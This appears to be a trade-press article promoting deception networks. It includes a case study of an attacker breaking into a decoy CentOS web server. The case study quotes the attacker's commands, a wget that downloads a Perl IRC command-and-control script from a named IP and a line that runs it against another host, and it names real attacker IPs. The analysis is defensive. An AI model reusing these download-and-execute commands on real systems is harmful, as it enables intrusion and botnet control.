Next Generation Tools: Deception Networks

There have been several predictions as to where adversary hacking is headed in the foreseeable future. Virtually all credible predictions have one thing in common: emerging attacks will be intelligent. In simple terms that means that these attacks will have the ability to make decisions and, to some extent, control their own actions without the support of a bot herder or other human control entity. Some analysts believe that, because this new generation of malcode operates at machine speed, it will be virtually impossible for humans to react fast enough to have any impact on the attack.

One example that has been floated by cyber experts is trickbot. Trickbot is best known as a banking credential stealer. It often is distributed using spam campaigns. Recently, Darktrace released a research report that speculated on some ways that current malware could be advanced to AI status. The report describes three scenarios using different malware types, including trickbot, as examples.

Their scenario for trickbot recasts the malware as “autonomous.” That means that the malware, once in the target system could take over using its own intelligence – rather than requiring instructions from a command and control (C2) server – to learn the target network, the user behavior patterns, such things as user/email naming conventions and network topology and defenses. Clearly, this behavior could be at machine/network speeds, far beyond the ability of human admins to launch a meaningful response.

Once the malware had learned the victim environment, it could proceed at its own speed to achieve its mission, such as credential stealing. Since an intelligent, machine-learning malware would know when it was being attacked, it could devise effective ways to go dormant until the threat was over and then resume its malicious behavior.

What we are describing here is what scientists studying complexity theory call “emergence.” Emergence refers to “the arising of novel and coherent structures, patterns, and properties during the process of self-organization in complex systems." Another way to think of emergence is “the ability of individual components of a large system to work together to give rise to dramatic and diverse behavior."

In other words, once a piece of intelligent malcode is injected into a victim system it develops attack and reconnaissance capabilities on its own through an "emergent" process driven by artificial intelligence and machine learning.

The only effective way to combat this type of attack is to meet it head-on with similarly intelligent defensive tools. Although it sounds a bit star wars-ish, what we have, then, will be a war of bots conducted within the target/victim system.

Enter The Deception Network

The idea behind a deception network is to allow the malcode's emergent process to continue, monitor, analyze forensically and document it, while doing all of this without endangering the production network of the target. There are several ways to do that and each one has its proponents.

The oldest method is the honeypot or collections of honeypots called honeynets. These rather primitive tools lure the attacker into something that looks like a real network and then analyze the attacker's behavior. The problem here is that most attackers have mechanisms to detect the presence of honeynets and avoid them.

Another method is to embed the deception network in the production network and lure the attacker into the deception network by making it indistinguishable from the production network while protecting the production network should the attack find his way in.

The third method is to overlay the deception network on the production network such that the attacker believes he is in a legitimate device – and, in a sense he is – and allow the attacker to attempt compromise with the deception network collecting data about the attack and guiding the attacker away from the production system into a safe /dev/nul environment.

The system we use in our lab is the BOTSink 3200 appliance from Attivo. This is sort of a mix of the two methods above in that there is a deception network of decoys coexisting with the production network. Through a collection of deceptive tools such as documents, email users, passwords, decoy devices and other tools consistent with the production network, the attacker is confused and is drawn to the decoys. For the purposes of this article, this is the tool we will use although, as we have said, there are others. The best way to illustrate a deception network and its application is to present a use case, here, our research application.

Figure 1 shows an overall view of one week of activity on our network. Note that the external IPs are connected to port 5 of the BOTSink and they have attracted a lot of attack and probe traffic. Our internal network is connected to port 6 and no attacks during the period have made it into the protected network. We are using decoys built on a couple of flavors of Windows and CENTOS. The decoys actually are ports on the virtual machines (the Windows and CENTOS VMs). The internal machines are both real and decoys. It is nearly impossible for an attacker to tell the difference.

[Figure 1 - One Week of Activity on Our Deception Network]

We have several research applications of the BOTSink in our lab, one of which is an open Internet connection with dozens of "exposed" devices (actually all decoys) that guide the attacker in to a sinkhole. We have forensics so that we can analyze the behavior of attackers as they move laterally through our network, or so they think. Figure one shows a typical week of attacks against our Internet-facing web server decoy.

[Figure 2 - Attacks Against Our Deception Network]

The computer in the center of the figure - 108.x.x.x - is our decoy web server. It is a virtual machine built on a CENTOS virtual host. The 17 attackers around the outside have been lured into attacking the decoy and we have gathered quite a bit of information about them, all the time guiding them away from any legitimate devices on our internal network. In each case the attacker has been successful in penetrating the decoy. Let's look at how.

Let's take an example from earlier in the year - 30 July 2019 to be accurate. We saw several examples of attacks against CENTOS web server from an IP in France (178.19.130.191). See Figure 2 for BOTSink details.

[Figure 3 - Attacks from 178.19.130.191 in France]

The attack is described as:

Deceptive Credential Usage ( SSHD authentication success: user: admin; Jul 30 11:57:13 CentOS70 sshd[13247]: Accepted password for admin from 178.19.130.191 port 53430 ssh2 Source Domain Name [191.130.19.178.abo.tutor.fr] )

This means that the attacker used deceptive credentials to penetrate our server as the user admin. Deceptive credentials are ones we set up for that account that do not work anywhere else in the real network. Therefore, if we see those credentials attempted against any device - real or decoy - we know that there is malicious intent. All of this misdirection occurs at network/device speed and without any human defender involved.

It is, of course, not enough to know that the attacker was successful penetrating the device - we see hundreds of successful penetration attempts per week on our system, but the attacker never takes his attack beyond penetration. We surmise from that an automated attack that simply collects the information without attempting to compromise the target.

Our next step is to look closely at what the attacker actually did once he penetrated the target. By extracting the activity report from BOTSink, we get the results in Figure 3.

[Figure 4 - BOTSink Activity Listing]

Note the last two lines in Figure 3 (highlight ours):

10 Attacker from Decoy VM CentOS70 attempting C&C HTTP connection to 203.146.208.208 via squid (web proxy) C&C.

11 Attacker from Decoy VM CentOS70 attempting C&C HTTP connection to 203.146.208.208 via squid (web proxy) C&C.

These tell us that after penetrating the device, the attacker attempts communication with a C2 server in Thailand. Running the IP of the C2 through Cisco Investigate we get:

Prefix ASN Network Owner Description

203.146.128.0/17 AS 4750 CSLOXINFO-AS-AP CS LOXINFO PUBLIC COMPANY LIMITED, TH 86400

Earlier in Figure 3 on line 5 we see a wget command: wget https://203.146.208.208/drago/images/.ssh/y.txt

Downloading the file from the server reveals that it is the communications script (perl) to the C2. Although the script needs some editing to insert the C2 address and some other details (which we see in lines 6 and 7 of Figure 3) we also see that the communication is via IRC (Internet Relay Chat).

There also is another clue to our attacker. in line 7, he moves y.txt to w.txt and then he edits it in line 8: perl w.txt 162.243.233.156.

If we lookup 162.243.233.156 we see that it is owned by Digital Ocean – a U.S. ISP but the two domains it hosts are Brazilian. Going to the web site we see that it is, indeed, Brazilian, an agricultural site, presumably one that our hacker has taken over. Is the hacker Brazilian? We can't tell at this point – there are multiple IPs and countries involved, but looking at the code we see some of it uses words that either are Portuguese or Spanish.

What has our deception network done for us that other, current generation tools, cannot? So far it has captured the history of an attack, protected us from the attack and given us more than enough to understand and block those attacks in the future. But there is much more that we can do that we have not done yet.

For example, we can analyze endpoints memory forensically and we can create individualized campaigns, all from within the BOTSink. It also can be quite useful to log into the decoy - in this case our Internet-facing web server - and analyze the attacker's behavior from inside the target. Since the decoy is a virtual machine, we can extract a copy of it and perform an external forensic analysis using our favorite tools.

Although the BOTSink provides us with a large number of pre-configured decoys, we can add decoy VMs of our own and we can modify the configuration of supplied decoys. When we are done with the decoys we can revert to the original snapshot. Many of these functions are typical in one way or another in deception networks. This is important because the real purpose of a deception network is two-fold.

First, we want to protect our production systems. The deception network helps us do that. But equally as important, it allows us to "pre-guess" what types of attacks and strategies might be used against us. That pre-knowledge allows us to set up our defenses such that we see these attacks as soon as they become live threats in the field.

However, we don't have to pre-guess manually (although, of course, we can if we wish) because the deception network does that for us. That is because the deception network behaves much like the smart malcode does. As we can see, the deception network is an emergent system as well.

Because the deception network adjusts to the attacks against it, it is able to defend against emergent attacks simply by learning what is coming at it and how to respond. Not all deception networks are quite there with all of that functionality yet but – and this is nearly as good – they can respond and reroute malicious traffic much faster than a human can. In the case of BOTSink, it does this using two types of campaigns: endpoint and network. In both cases, the tool uses machine learning to mimic the production network and to adjust its environment on the fly.

In a network campaign, the deception network learns directly from network traffic. Understanding what the production network traffic is doing and what it looks like allows the BOTSink to deploy deception elements that look exactly as if they belong in the production network. To the attacker, the two networks are a seamless single entity.

In an endpoint campaign, the same type of learning occurs but with some different specifics. First, the deception network learns from the Active Directory instead of network traffic. It creates lures - decoy entities - that match the production network's AD elements exactly.

Second, it creates endpoint lures that match the environment that the deception network has learned. Those lures can be decoy devices, user accounts (decoy accounts) that look exactly like genuine users, decoy documents that lure the attacker into taking some action such as attempting exfiltration, or decoy email accounts that attract phishing attempts.

The deception network knows what is permitted and, even if a malcode is emergent, it can respond and route malicious traffic to decoys, unless, of course, a decoy is attacked directly as in our example. Note that this deceptive behavior is exactly what analysts predict next-generation malware and malcode will do in pretty much the same way.

Piecing it all together

So where does a deception network fit into your cyber defense strategy? The answer to that is in the first section of this article: it addresses the emergent nature of the next generation of smart malcode and malware.

It works by allowing but managing malicious emergence at machine and network speeds by learning proper behavior and responding to improper behavior. It allows both protection and analysis leading to the ability to be proactive without regard for the specifics of the next attack.

While there are several – but, surprisingly, not many – deception networks on the market, at their core they accomplish the same things but they do their jobs differently. In our lab environment we have been very happy with the BOTSink but, as they say, your mileage may vary.

Your first task, of course, is to decide if a deception network is the right approach for your environment. They can be a bit taxing to set up but once in operation they take on the heavy lifting of learning the network, the users, the data and the behavior that is necessary to protect the enterprise. This learning process is ongoing.